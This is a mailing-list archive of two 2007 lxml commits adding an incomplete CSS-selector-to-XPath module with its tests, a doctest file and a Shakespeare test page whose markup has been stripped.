Jun 2007 18:51:58 +0200 (CEST) Subject: [Lxml-checkins] r44621 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070629165158.43BB68118@code0.codespeak.net> Author: ianb Date: Fri Jun 29 18:51:58 2007 New Revision: 44621 Added: lxml/branch/html/src/lxml/html/tests/css_shakespear.html (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_css.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_css.txt (contents, props changed) Log: Added incomplete CSS selector code Added: lxml/branch/html/src/lxml/html/tests/css_shakespear.html ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/css_shakespear.html Fri Jun 29 18:51:58 2007 @@ -0,0 +1,526 @@ + + + + + + + + + +
+
+

As You Like It

+
+ + by William Shakespeare + + +
+
+ +

ACT I, SCENE III. A room in the palace.

+ +
+
Enter CELIA and ROSALIND
+ +
+ +
CELIA
+ +
+
Why, cousin! why, Rosalind! Cupid have mercy! not a word?
+ +
+ +
ROSALIND
+ +
+
Not one to throw at a dog.
+ +
+ +
CELIA
+ +
+
No, thy words are too precious to be cast away upon
+ +
curs; throw some of them at me; come, lame me with reasons.
+ +
+ +
ROSALIND
+ +
CELIA
+ +
+
But is all this for your father?
+ +
+ +
+
Then there were two cousins laid up; when the one
+
should be lamed with reasons and the other mad
+ +
without any.
+
+ +
ROSALIND
+ +
+
No, some of it is for my child's father. O, how
+ +
full of briers is this working-day world!
+ +
+ +
CELIA
+ +
+ +
They are but burs, cousin, thrown upon thee in
+
holiday foolery: if we walk not in the trodden
+ +
paths our very petticoats will catch them.
+ +
+ +
ROSALIND
+ +
+
I could shake them off my coat: these burs are in my heart.
+
+ +
CELIA
+ +
+
Hem them away.
+ +
+ +
ROSALIND
+ +
+ +
I would try, if I could cry 'hem' and have him.
+
+ +
CELIA
+ +
+
Come, come, wrestle with thy affections.
+ +
+ +
ROSALIND
+
+
O, they take the part of a better wrestler than myself!
+ +
+ +
CELIA
+ +
+ +
O, a good wish upon you! you will try in time, in
+
despite of a fall. But, turning these jests out of
+
service, let us talk in good earnest: is it
+ +
possible, on such a sudden, you should fall into so
+ +
strong a liking with old Sir Rowland's youngest son?
+ +
+ +
ROSALIND
+
+
The duke my father loved his father dearly.
+ +
+ +
CELIA
+ +
+ +
Doth it therefore ensue that you should love his son
+ +
dearly? By this kind of chase, I should hate him,
+ +
for my father hated his father dearly; yet I hate
+ +
not Orlando.
+ +
+ +
ROSALIND
+ +
+ +
No, faith, hate him not, for my sake.
+ +
+ +
CELIA
+ +
+
Why should I not? doth he not deserve well?
+ +
+ +
ROSALIND
+ +
+
Let me love him for that, and do you love him
+
because I do. Look, here comes the duke.
+
+ +
CELIA
+ +
+ +
With his eyes full of anger.
+
Enter DUKE FREDERICK, with Lords
+
+ +
DUKE FREDERICK
+ +
+ +
Mistress, dispatch you with your safest haste
+ +
And get you from our court.
+
+ +
ROSALIND
+ +
+ +
Me, uncle?
+ +
+ +
DUKE FREDERICK
+
+
You, cousin
+ +
Within these ten days if that thou be'st found
+ +
So near our public court as twenty miles,
+ +
Thou diest for it.
+ +
+ +
ROSALIND
+ +
+ +
I do beseech your grace,
+ +
Let me the knowledge of my fault bear with me:
+
If with myself I hold intelligence
+ +
Or have acquaintance with mine own desires,
+ +
If that I do not dream or be not frantic,--
+ +
As I do trust I am not--then, dear uncle,
+ +
Never so much as in a thought unborn
+ +
Did I offend your highness.
+ +
+ +
DUKE FREDERICK
+ +
+
Thus do all traitors:
+ +
If their purgation did consist in words,
+ +
They are as innocent as grace itself:
+ +
Let it suffice thee that I trust thee not.
+ +
+ +
ROSALIND
+ +
+ +
Yet your mistrust cannot make me a traitor:
+ +
Tell me whereon the likelihood depends.
+ +
+ +
DUKE FREDERICK
+
+ +
Thou art thy father's daughter; there's enough.
+ +
+ +
ROSALIND
+ +
+
So was I when your highness took his dukedom;
+
So was I when your highness banish'd him:
+ +
Treason is not inherited, my lord;
+ +
Or, if we did derive it from our friends,
+ +
What's that to me? my father was no traitor:
+ +
Then, good my liege, mistake me not so much
+
To think my poverty is treacherous.
+ +
+ +
CELIA
+
+ +
Dear sovereign, hear me speak.
+ +
+ +
DUKE FREDERICK
+ +
+
Ay, Celia; we stay'd her for your sake,
+
Else had she with her father ranged along.
+ +
+ +
CELIA
+ +
+ +
I did not then entreat to have her stay;
+
It was your pleasure and your own remorse:
+
I was too young that time to value her;
+ +
But now I know her: if she be a traitor,
+ +
Why so am I; we still have slept together,
+ +
Rose at an instant, learn'd, play'd, eat together,
+
And wheresoever we went, like Juno's swans,
+ +
Still we went coupled and inseparable.
+
+ +
DUKE FREDERICK
+ +
+
She is too subtle for thee; and her smoothness,
+
Her very silence and her patience
+
Speak to the people, and they pity her.
+
Thou art a fool: she robs thee of thy name;
+ +
And thou wilt show more bright and seem more virtuous
+ +
When she is gone. Then open not thy lips:
+
Firm and irrevocable is my doom
+
Which I have pass'd upon her; she is banish'd.
+
+ +
CELIA
+ +
+
Pronounce that sentence then on me, my liege:
+
I cannot live out of her company.
+
+ +
DUKE FREDERICK
+ +
+
You are a fool. You, niece, provide yourself:
+ +
If you outstay the time, upon mine honour,
+
And in the greatness of my word, you die.
+
Exeunt DUKE FREDERICK and Lords
+
+ +
CELIA
+
+ +
O my poor Rosalind, whither wilt thou go?
+ +
Wilt thou change fathers? I will give thee mine.
+
I charge thee, be not thou more grieved than I am.
+ +
+ +
ROSALIND
+ +
+ +
I have more cause.
+
+ +
CELIA
+ +
+
Thou hast not, cousin;
+ +
Prithee be cheerful: know'st thou not, the duke
+ +
Hath banish'd me, his daughter?
+ +
+ +
ROSALIND
+
+
That he hath not.
+ +
+ +
CELIA
+ +
+ +
No, hath not? Rosalind lacks then the love
+ +
Which teacheth thee that thou and I am one:
+
Shall we be sunder'd? shall we part, sweet girl?
+ +
No: let my father seek another heir.
+ +
Therefore devise with me how we may fly,
+ +
Whither to go and what to bear with us;
+
And do not seek to take your change upon you,
+
To bear your griefs yourself and leave me out;
+ +
For, by this heaven, now at our sorrows pale,
+ +
Say what thou canst, I'll go along with thee.
+ +
+ +
ROSALIND
+
+ +
Why, whither shall we go?
+ +
+ +
CELIA
+ +
+
To seek my uncle in the forest of Arden.
+
+ +
ROSALIND
+ +
+ +
Alas, what danger will it be to us,
+ +
Maids as we are, to travel forth so far!
+
Beauty provoketh thieves sooner than gold.
+ +
+ +
CELIA
+ +
+
I'll put myself in poor and mean attire
+ +
And with a kind of umber smirch my face;
+
The like do you: so shall we pass along
+ +
And never stir assailants.
+ +
+ +
ROSALIND
+
+ +
Were it not better,
+ +
Because that I am more than common tall,
+ +
That I did suit me all points like a man?
+ +
A gallant curtle-axe upon my thigh,
+ +
A boar-spear in my hand; and--in my heart
+ +
Lie there what hidden woman's fear there will--
+ +
We'll have a swashing and a martial outside,
+ +
As many other mannish cowards have
+ +
That do outface it with their semblances.
+ +
+ +
CELIA
+ +
+ +
What shall I call thee when thou art a man?
+
+ +
ROSALIND
+ +
+
I'll have no worse a name than Jove's own page;
+ +
And therefore look you call me Ganymede.
+ +
But what will you be call'd?
+ +
+ +
CELIA
+ +
+ +
Something that hath a reference to my state
+
No longer Celia, but Aliena.
+ +
+ +
ROSALIND
+
+ +
But, cousin, what if we assay'd to steal
+ +
The clownish fool out of your father's court?
+ +
Would he not be a comfort to our travel?
+ +
+ +
CELIA
+ +
+ +
He'll go along o'er the wide world with me;
+ +
Leave me alone to woo him. Let's away,
+
And get our jewels and our wealth together,
+ +
Devise the fittest time and safest way
+ +
To hide us from pursuit that will be made
+ +
After my flight. Now go we in content
+ +
To liberty and not to banishment.
+
Exeunt
+ +
+ +
+
+
+ + + \ No newline at end of file Added: lxml/branch/html/src/lxml/html/tests/test_css.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css.py Fri Jun 29 18:51:58 2007 @@ -0,0 +1,112 @@ +import unittest +from lxml.tests.common_imports import doctest +from lxml import html +from lxml.html import css +import os + +doc_fn = os.path.join(os.path.dirname(__file__), + 'css_shakespear.html') + +# Data borrowed from http://mootools.net/slickspeed/ + +class CSSTestCase(unittest.TestCase): + + selectors = [ + ('*', 252), + ('div:only-child', 22), # ? + ('div:contains(CELIA)', 243), + ('div:nth-child(even)', 106), + ('div:nth-child(2n)', 106), + ('div:nth-child(odd)', 137), + ('div:nth-child(2n+1)', 137), + ('div:nth-child(n)', 243), + ('div:last-child', 53), + ('div:first-child', 51), + ('div > div', 242), + ('div + div', 190), + ('div ~ div', 190), + ('body', 1), + ('body div', 243), + ('div', 243), + ('div div', 242), + ('div div div', 241), + ('div, div, div', 243), + ('div, a, span', 243), + ('.dialog', 51), + ('div.dialog', 51), + ('div .dialog', 51), + ('div.character, div.dialog', 99), + ('#speech5', 1), + ('div#speech5', 1), + ('div #speech5', 1), + ('div.scene div.dialog', 49), + ('div#scene1 div.dialog div', 142), + ('#scene1 #speech1', 1), + ('div[class]', 103), + ('div[class=dialog]', 50), + ('div[class^=dia]', 51), + ('div[class$=log]', 50), + ('div[class*=sce]', 1), + ('div[class|=dialog]', 50), # ? Seems right + ('div[class!=madeup]', 243), # ? Seems right + ('div[class~=dialog]', 51), # ? 
Seems right + ] + + def __init__(self, index): + self.index = index + unittest.TestCase.__init__(self) + + @classmethod + def all(cls): + for i in range(len(cls.selectors)): + yield cls(i) + + def runTest(self): + f = open(doc_fn, 'rb') + c = f.read() + f.close() + doc = html.HTML(c) + body = doc.xpath('//body')[0] + bad = [] + selector, count = self.selectors[self.index] + xpath = css.xpath(css.parse(selector)) + try: + results = body.xpath(xpath) + except Exception, e: + e.args = ("%s for xpath %r" % (e, xpath)) + raise + found = {} + for item in results: + if item in found: + assert 0, ( + "Element shows up multiple times: %r" % item) + found[item] = None + if isinstance(results, basestring): + assert 0, ( + "Got string result (%r), not element, for xpath %r" + % (results[:20], str(xpath))) + if len(results) != count: + #if self.shortDescription() == 'div.character, div.dialog': + # import pdb; pdb.set_trace() + assert 0, ( + "Did not get expected results (%s) instead %s for xpath %r" + % (count, len(results), str(xpath))) + + def shortDescription(self): + return self.selectors[self.index][0] + +def unique(s): + found = {} + result = [] + for item in s: + if item in found: + continue + found[item] = None + result.append(s) + return result + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_css.txt')]) + suite.addTests(list(CSSTestCase.all())) + return suite Added: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Fri Jun 29 18:51:58 2007 @@ -0,0 +1,110 @@ +A quick test of tokenizing: + + >>> from lxml.html.css import tokenize, parse + >>> def ptok(s): + ... for item in tokenize(s): + ... 
print repr(item) + >>> ptok('E > f[a~="y\\"x"]') + Symbol(u'E', 0) + Token(u'>', 2) + Symbol(u'f', 4) + Token(u'[', 5) + Symbol(u'a', 6) + Token(u'~=', 7) + String(u'y"x', 9) + Token(u']', 15) + +Then of parsing: + + >>> parse('div, td.foo, div.bar span') + Or([Element[div], Class[Element[td].foo], CombinedSelector[Class[Element[div].bar] Element[span]]]) + >>> parse('div > p') + CombinedSelector[Element[div] > Element[p]] + >>> parse('td:first') + Pseudo[Element[td]:first] + >>> parse('a[name]') + Attrib[Element[a][name]] + >>> parse('a[rel="include"]') + Attrib[Element[a][rel = String(u'include', 6)]] + >>> parse('a[hreflang |= \'en\']') + Attrib[Element[a][hreflang |= String(u'en', 14)]] + >>> parse('div:nth-child(10)') + Function[Element[div]:nth-child(10)] + >>> parse('div:nth-of-type(10)') + Function[Element[div]:nth-of-type(10)] + >>> parse('label:only') + Pseudo[Element[label]:only] + >>> parse('a:lang(fr)') + Function[Element[a]:lang(Element[fr])] + >>> parse('div:contains("foo")') + Function[Element[div]:contains(String(u'foo', 13))] + >>> parse('div#foobar') + Hash[Element[div]#foobar] + >>> parse('div:not(div.foo)') + Function[Element[div]:not(Class[Element[div].foo])] + >>> parse('td ~ th') + CombinedSelector[Element[td] ~ Element[th]] + +Now of translation: + + >>> def xpath(css): + ... 
print parse(css).xpath() + >>> xpath('*') + * + >>> xpath('E') + e + >>> xpath('E[foo]') + e[@foo] + >>> xpath('E[foo="bar"]') + e[@foo = 'bar'] + >>> xpath('E[foo~="bar"]') + e[contains(concat(' ', normalize-space(@foo), ' '), ' bar ')] + >>> xpath('E[foo^="bar"]') + e[starts-with(@foo, 'bar')] + >>> xpath('E[foo$="bar"]') + e[substring(@foo, string-length(@foo)-2) = 'bar'] + >>> xpath('E[foo*="bar"]') + e[contains(@foo, 'bar')] + >>> xpath('E[hreflang|="en"]') + e[@hreflang = 'en' or starts-with(@hreflang, 'en-')] + >>> #xpath('E:root') + >>> xpath('E:nth-child(1)') + */e[0] + >>> xpath('E:nth-last-child(1)') + */e[last() - 0] + >>> xpath('E:nth-of-type(1)') + */e[0] + >>> xpath('E:nth-last-of-type(1)') + */e[last() - 0] + >>> xpath('E:first-child') + */e[position() = 0] + >>> xpath('E:last-child') + */e[position() = last()] + >>> xpath('E:first-of-type') + */e[0] + >>> xpath('E:last-of-type') + e[last()] + >>> xpath('E:only-child') + e[count(..) = 1] + >>> xpath('E:only-of-type') + e[count(../node-name(.)) = 1] + >>> xpath('E:empty') + e[count(.) = 0 and string(.) 
= ''] + >>> xpath('E:contains("foo")') + e[contains(css:lower-case(string(.)), 'foo')] + >>> xpath('E.warning') + e[contains(concat(' ', normalize-space(@class), ' '), ' warning ')] + >>> xpath('E#myid') + e[@id='myid'] + >>> xpath('E:not(:contains("foo"))') + e[not(contains(css:lower-case(string(.)), 'foo'))] + >>> xpath('E F') + e/descendant::f + >>> xpath('E > F') + e/f + >>> xpath('E + F') + e/following-sibling::f[0] + >>> xpath('E ~ F') + e/following-sibling::f + >>> xpath('div#container p') + div[@id='container']/descendant::p From ianb at codespeak.net Fri Jun 29 18:52:18 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 Jun 2007 18:52:18 +0200 (CEST) Subject: [Lxml-checkins] r44622 - lxml/branch/html/src/lxml/html Message-ID: <20070629165218.EFE2680AE@code0.codespeak.net> Author: ianb Date: Fri Jun 29 18:52:18 2007 New Revision: 44622 Added: lxml/branch/html/src/lxml/html/css.py (contents, props changed) Log: css module to go with last commit Added: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/css.py Fri Jun 29 18:52:18 2007 @@ -0,0 +1,801 @@ +import re +from lxml import etree + +class SelectorSyntaxError(Exception): + pass + +class ExpressionError(Exception): + pass + +class _UniToken(unicode): + def __new__(cls, contents, pos): + obj = unicode.__new__(cls, contents) + obj.pos = pos + return obj + + def __repr__(self): + return '%s(%s, %r)' % ( + self.__class__.__name__, + unicode.__repr__(self), + self.pos) + +class Symbol(_UniToken): + pass + +class String(_UniToken): + pass + +class Token(_UniToken): + pass + +############################################################ +## Parsing +############################################################ + +############################## +## Syntax objects: + +class Class(object): + """ + Represents selector.class_name + """ + + def __init__(self, selector, class_name): + 
self.selector = selector + self.class_name = class_name + + def __repr__(self): + return '%s[%r.%s]' % ( + self.__class__.__name__, + self.selector, + self.class_name) + + def xpath(self): + sel_xpath = self.selector.xpath() + sel_xpath.add_condition( + "contains(concat(' ', normalize-space(@class), ' '), %s)" % xpath_repr(' '+self.class_name+' ')) + return sel_xpath + +class Function(object): + """ + Represents selector:name(expr) + """ + + unsupported = [ + 'target', 'lang', 'enabled', 'disabled',] + + def __init__(self, selector, type, name, expr): + self.selector = selector + self.type = type + self.name = name + self.expr = expr + + def __repr__(self): + return '%s[%r%s%s(%r)]' % ( + self.__class__.__name__, + self.selector, + self.type, self.name, self.expr) + + def xpath(self): + sel_path = self.selector.xpath() + if self.name in self.unsupported: + raise ExpressionError( + "The psuedo-class %r is not supported" % self.name) + method = '_xpath_' + self.name.replace('-', '_') + if not hasattr(self, method): + raise ExpressionError( + "The psuedo-class %r is unknown" % self.name) + method = getattr(self, method) + return method(sel_path, self.expr) + + def _xpath_nth_child(self, xpath, expr, last=False): + if isinstance(expr, int): + return self._xpath_nth_child_simple(xpath, expr, last) + if not isinstance(expr, int): + a, b = parse_series(expr) + if not a: + # a=0 means nothing is returned... 
+ xpath.add_condition('false()') + return xpath + if a == 1: + return self._xpath_nth_child_simple(xpath, expr, last) + if b > 0: + b_neg = str(-b) + else: + b_neg = '+%s' % (-b) + expr = '(position() %s) mod %s = 0' % (b_neg, a) + if b >= 0: + expr += ' and position() >= %s' % b + xpath.add_condition(expr) + return xpath + # FIXME: handle an+b, odd, even + # an+b means every-a, plus b, e.g., 2n+1 means odd + # 0n+b means b + # n+0 means a=1, i.e., all elements + # an means every a elements, i.e., 2n means even + # -n means -1n + # -1n+6 means elements 6 and previous + + def _xpath_nth_child_simple(self, xpath, expr, last=False): + if isinstance(expr, int): + expr -= 1 + if last: + expr = 'last() - %s' % expr + xpath = XPath('*/%s' % xpath) + xpath.add_index(expr) + return xpath + + def _xpath_nth_last_child(self, xpath, expr): + return self._xpath_nth_child(xpath, expr, last=True) + + def _xpath_nth_of_type(self, xpath, expr, last=False): + # Like nth-of-type, but only for *this* type + if isinstance(expr, int): + expr -= 1 + if last: + expr = 'last() - %s' % expr + xpath = XPath('*/%s' % xpath) + xpath.add_index(expr) + return xpath + else: + raise NotImplementedError + + def _xpath_nth_last_of_type(self, xpath, expr): + return self._xpath_nth_of_type(xpath, expr, last=True) + + def _xpath_contains(self, xpath, expr): + # text content, minus tags, must contain expr + if isinstance(expr, Element): + expr = expr._format_element() + xpath.add_condition('contains(css:lower-case(string(.)), %s)' + % xpath_repr(expr.lower())) + return xpath + + def _xpath_not(self, xpath, expr): + # everything for which not expr applies + expr = expr.xpath() + cond = expr.condition + # FIXME: should I do something about element_path? 
+ xpath.add_condition('not(%s)' % cond) + return xpath + +def _make_lower_case(context, s): + return s.lower() + +etree.FunctionNamespace("css")['lower-case'] = _make_lower_case + +class Pseudo(object): + """ + Represents selector:ident + """ + + unsupported = ['indeterminate', 'first-line', 'first-letter', + 'selection', 'before', 'after', 'link', 'visited', + 'active', 'focus', 'hover'] + + def __init__(self, element, type, ident): + self.element = element + assert type in (':', '::') + self.type = type + self.ident = ident + + def __repr__(self): + return '%s[%r%s%s]' % ( + self.__class__.__name__, + self.element, + self.type, self.ident) + + def xpath(self): + el_xpath = self.element.xpath() + if self.ident in self.unsupported: + raise ExpressionError( + "The psuedo-class %r is unsupported" % self.ident) + method = '_xpath_' + self.ident.replace('-', '_') + if not hasattr(self, method): + raise ExpressionError( + "The psuedo-class %r is unknown" % self.ident) + method = getattr(self, method) + el_xpath = method(el_xpath) + return el_xpath + + def _xpath_checked(self, xpath): + xpath.add_condition("(@selected or @checked) and (node-name(.) = 'input' or node-name(.) = 'option')") + return xpath + + def _xpath_root(self, xpath): + # if this element is the root element + raise NotImplementedError + + def _xpath_first_child(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_condition('position() = 0') + return xpath + + def _xpath_last_child(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_condition('position() = last()') + return xpath + + def _xpath_first_of_type(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_index(0) + return xpath + + def _xpath_last_of_type(self, xpath): + xpath.add_index('last()') + return xpath + + def _xpath_only_child(self, xpath): + xpath.add_condition('count(..) 
= 1') + return xpath + + def _xpath_only_of_type(self, xpath): + # FIXME: I doubt this is right + xpath.add_condition('count(../node-name(.)) = 1') + return xpath + + def _xpath_empty(self, xpath): + xpath.add_condition("count(.) = 0 and string(.) = ''") + return xpath + +class Attrib(object): + """ + Represents selector[namespace|attrib operator value] + """ + + def __init__(self, selector, namespace, attrib, operator, value): + self.selector = selector + self.namespace = namespace + self.attrib = attrib + self.operator = operator + self.value = value + + def __repr__(self): + if self.operator == 'exists': + return '%s[%r[%s]]' % ( + self.__class__.__name__, + self.selector, + self._format_attrib()) + else: + return '%s[%r[%s %s %r]]' % ( + self.__class__.__name__, + self.selector, + self._format_attrib(), + self.operator, + self.value) + + def _format_attrib(self): + if self.namespace == '*': + return self.attrib + else: + return '%s|%s' % (self.namespace, self.attrib) + + def _xpath_attrib(self): + # FIXME: if attrib is *? + if self.namespace == '*': + return '@' + self.attrib + else: + return '@%s:%s' % (self.namespace, self.attrib) + + def xpath(self): + path = self.selector.xpath() + attrib = self._xpath_attrib() + value = self.value + if self.operator == 'exists': + assert not value + path.add_condition(attrib) + elif self.operator == '=': + path.add_condition('%s = %s' % (attrib, + xpath_repr(value))) + elif self.operator == '!=': + # FIXME: this seems like a weird hack... + if value: + path.add_condition('not(%s) or %s != %s' + % (attrib, attrib, xpath_repr(value))) + else: + path.add_condition('%s != %s' + % (attrib, xpath_repr(value))) + #path.add_condition('%s != %s' % (attrib, xpath_repr(value))) + elif self.operator == '~=': + path.add_condition("contains(concat(' ', normalize-space(%s), ' '), %s)" % (attrib, xpath_repr(' '+value+' '))) + elif self.operator == '|=': + # Weird, but true... 
+ path.add_condition('%s = %s or starts-with(%s, %s)' % ( + attrib, xpath_repr(value), + attrib, xpath_repr(value + '-'))) + elif self.operator == '^=': + path.add_condition('starts-with(%s, %s)' % ( + attrib, xpath_repr(value))) + elif self.operator == '$=': + # Oddly there is a starts-with in XPath 1.0, but not ends-with + path.add_condition('substring(%s, string-length(%s)-%s) = %s' + % (attrib, attrib, len(value)-1, xpath_repr(value))) + elif self.operator == '*=': + path.add_condition('contains(%s, %s)' % ( + attrib, xpath_repr(value))) + else: + assert 0, ("Unknown operator: %r" % self.operator) + return path + +class Element(object): + """ + Represents namespace|element + """ + + def __init__(self, namespace, element): + self.namespace = namespace + self.element = element + + def __repr__(self): + return '%s[%s]' % ( + self.__class__.__name__, + self._format_element()) + + def _format_element(self): + if self.namespace == '*': + return self.element + else: + return '%s|%s' % (self.namespace, self.element) + + def xpath(self): + if self.namespace == '*': + return XPath(self.element.lower()) + else: + return XPath('%s:%s' % (self.namespace, self.element)) + +class Hash(object): + """ + Represents selector#id + """ + + def __init__(self, selector, id): + self.selector = selector + self.id = id + + def __repr__(self): + return '%s[%r#%s]' % ( + self.__class__.__name__, + self.selector, self.id) + + def xpath(self): + path = self.selector.xpath() + path.add_condition('@id=%s' % xpath_repr(self.id)) + return path + +class Or(object): + + def __init__(self, items): + self.items = items + def __repr__(self): + return '%s(%r)' % ( + self.__class__.__name__, + self.items) + + def xpath(self): + paths = [item.xpath() for item in self.items] + return XPathOr(paths) + +class CombinedSelector(object): + + _method_mapping = { + ' ': 'descendant', + '>': 'child', + '+': 'direct_adjacent', + '~': 'indirect_adjacent', + } + + def __init__(self, selector, combinator, 
subselector): + assert selector is not None + self.selector = selector + self.combinator = combinator + self.subselector = subselector + + def __repr__(self): + if self.combinator == ' ': + comb = '' + else: + comb = self.combinator + return '%s[%r %s %r]' % ( + self.__class__.__name__, + self.selector, + comb, + self.subselector) + + def xpath(self): + if self.combinator not in self._method_mapping: + raise ExpressionError( + "Unknown combinator: %r" % self.combinator) + method = '_xpath_' + self._method_mapping[self.combinator] + method = getattr(self, method) + path = self.selector.xpath() + return method(path, self.subselector) + + def _xpath_descendant(self, xpath, sub): + # when sub is a descendant in any way of xpath + return XPath('%s/descendant::%s' % (xpath, sub.xpath())) + + def _xpath_child(self, xpath, sub): + # when sub is an immediate child of xpath + return XPath(str(xpath) + '/' + str(sub.xpath())) + + def _xpath_direct_adjacent(self, xpath, sub): + # when sub immediately follows xpath + path = self._xpath_indirect_adjacent(xpath, sub) + path.add_index(0) + return path + + def _xpath_indirect_adjacent(self, xpath, sub): + # when sub comes somewhere after xpath as a sibling + return XPath('%s/following-sibling::%s' % ( + xpath, sub.xpath())) + + +############################## +## XPath objects: + +def xpath(css_expr, prefix='descendant-or-self::'): + if isinstance(css_expr, basestring): + css_expr = parse(css_expr) + expr = css_expr.xpath() + assert expr is not None, ( + "Got None for xpath expression from %s" % repr(css_expr)) + if isinstance(expr, XPathOr): + for item in expr.items: + item.element_path = prefix + item.element_path + else: + expr.element_path = prefix + expr.element_path + return str(expr) + +def run_xpath(doc, xpath): + return [el for el in doc.xpath(xpath) + if isinstance(el, etree.ElementBase)] + +def run_css(doc, css): + return run_xpath(doc, xpath(css)) + +class XPath(object): + + def __init__(self, element_path, 
condition=None): + self.element_path = element_path + self.condition = condition + + def __str__(self): + path = str(self.element_path) + if self.condition: + path += '[%s]' % self.condition + return path + + def __repr__(self): + return '%s[%s]' % ( + self.__class__.__name__, self) + + def add_condition(self, condition): + if self.condition: + self.condition = '%s and (%s)' % (self.condition, condition) + else: + self.condition = condition + + def add_index(self, index): + self.element_path = '%s[%s]' % (self.element_path, index) + +class XPathOr(XPath): + + """ + Represents on |'d expressions. Note that unfortunately it isn't + the union, it's the sum, so duplicate elements will appear. + """ + + def __init__(self, items): + for item in items: + assert item is not None + self.items = items + + def __str__(self): + return ' | '.join(map(str, self.items)) + + +def xpath_repr(s): + # FIXME: I don't think this is right + if isinstance(s, Element): + # This is probably a symbol that looks like an expression... 
+ s = s._format_element() + return repr(str(s)) + +############################## +## Parsing functions + +def parse(string): + stream = TokenStream(tokenize(string)) + stream.source = string + try: + return parse_selector_group(stream) + except SelectorSyntaxError, e: + e.args = tuple(["%s at %s -> %s" % ( + e, stream.used, list(stream))]) + raise + +def parse_selector_group(stream): + result = [] + while 1: + result.append(parse_selector(stream)) + if stream.peek() == ',': + stream.next() + else: + break + if len(result) == 1: + return result[0] + else: + return Or(result) + +def parse_selector(stream): + result = parse_simple_selector(stream) + while 1: + peek = stream.peek() + if peek == ',' or peek == ')' or peek is None: + return result + if stream.peek() in ('+', '>', '~'): + # A combinator + combinator = stream.next() + else: + combinator = ' ' + next_selector = parse_simple_selector(stream) + result = CombinedSelector(result, combinator, next_selector) + return result + +def parse_simple_selector(stream): + peek = stream.peek() + if peek != '*' and not isinstance(peek, Symbol): + element = namespace = '*' + else: + next = stream.next() + if next != '*' and not isinstance(next, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % next) + if stream.peek() == '|': + namespace = next + stream.next() + element = stream.next() + if element != '*' and not isinstance(next, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % next) + else: + namespace = '*' + element = next + result = Element(namespace, element) + has_hash = False + while 1: + peek = stream.peek() + if peek == '#': + if has_hash: + # You can't have two hashes + # (FIXME: is there some more general rule I'm missing?) 
+ break + stream.next() + result = Hash(result, stream.next()) + has_hash = True + continue + elif peek == '.': + stream.next() + result = Class(result, stream.next()) + continue + elif peek == '[': + stream.next() + result = parse_attrib(result, stream) + next = stream.next() + if not next == ']': + raise SelectorSyntaxError( + "] expected, got %r" % next) + continue + elif peek == ':' or peek == '::': + type = stream.next() + ident = stream.next() + if not isinstance(ident, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % ident) + if stream.peek() == '(': + stream.next() + peek = stream.peek() + if isinstance(peek, String): + selector = stream.next() + elif isinstance(peek, Symbol) and is_int(peek): + selector = int(stream.next()) + else: + # FIXME: parse_simple_selector, or selector, or...? + selector = parse_simple_selector(stream) + next = stream.next() + if not next == ')': + raise SelectorSyntaxError( + "Expected ), got %r and %r" + % (next, selector)) + result = Function(result, type, ident, selector) + else: + result = Pseudo(result, type, ident) + continue + else: + break + # FIXME: not sure what "negation" is + return result + +def is_int(v): + try: + int(v) + except ValueError: + return False + else: + return True + +def parse_attrib(selector, stream): + attrib = stream.next() + if stream.peek() == '|': + namespace = attrib + stream.next() + attrib = stream.next() + else: + namespace = '*' + if stream.peek() == ']': + return Attrib(selector, namespace, attrib, 'exists', None) + op = stream.next() + if not op in ('^=', '$=', '*=', '=', '~=', '|=', '!='): + raise SelectorSyntaxError( + "Operator expected, got %r" % op) + value = stream.next() + if not isinstance(value, (Symbol, String)): + raise SelectorSyntaxError( + "Expected string or symbol, got %r" % value) + return Attrib(selector, namespace, attrib, op, value) + +def parse_series(s): + """ + Parses things like '1n+2', or 'an+b' generally, returning (a, b) + """ + if isinstance(s, 
Element): + s = s._format_element() + if isinstance(s, int): + # Happens when you just get a number + return (1, s) + if s == 'odd': + return (2, 1) + elif s == 'even': + return (2, 0) + if 'n' not in s: + # Just a b + return int(s) + a, b = s.split('n', 1) + if not a: + a = 1 + elif a == '-' or a == '+': + a = int(a+'1') + else: + a = int(a) + if not b: + b = 0 + elif b == '-' or b == '+': + b = int(b+'1') + else: + b = int(b) + return (a, b) + + +############################################################ +## Tokenizing +############################################################ + +_whitespace_re = re.compile(r'\s+') + +_comment_re = re.compile(r'/\*.*?\*/', re.S) + +_count_re = re.compile(r'[+-]?\d*n(?:[+-]\d+)?') + +def tokenize(s): + pos = 0 + s = _comment_re.sub('', s) + while 1: + match = _whitespace_re.match(s, pos=pos) + if match: + pos = match.end() + if pos >= len(s): + return + match = _count_re.match(s, pos=pos) + if match and match.group() != 'n': + sym = s[pos:match.end()] + yield Symbol(sym, pos) + pos = match.end() + continue + c = s[pos] + c2 = s[pos:pos+2] + if c2 in ('~=', '|=', '^=', '$=', '*=', '::', '!='): + yield Token(c2, pos) + pos += 2 + continue + if c in '>+~,.*=[]()|:#': + yield Token(c, pos) + pos += 1 + continue + if c == '"' or c == "'": + # Quoted string + old_pos = pos + sym, pos = tokenize_escaped_string(s, pos) + yield String(sym, old_pos) + continue + old_pos = pos + sym, pos = tokenize_symbol(s, pos) + yield Symbol(sym, old_pos) + continue + +def tokenize_escaped_string(s, pos): + quote = s[pos] + assert quote in ('"', "'") + pos = pos+1 + start = pos + while 1: + next = s.find(quote, pos) + if next == -1: + raise SelectorSyntaxError( + "Expected closing %s for string in: %r" + % (quote, s[start:])) + result = s[start:next] + try: + result = result.decode('unicode_escape') + except UnicodeDecodeError: + # Probably a hanging \ + pos = next+1 + else: + return result, next+1 + 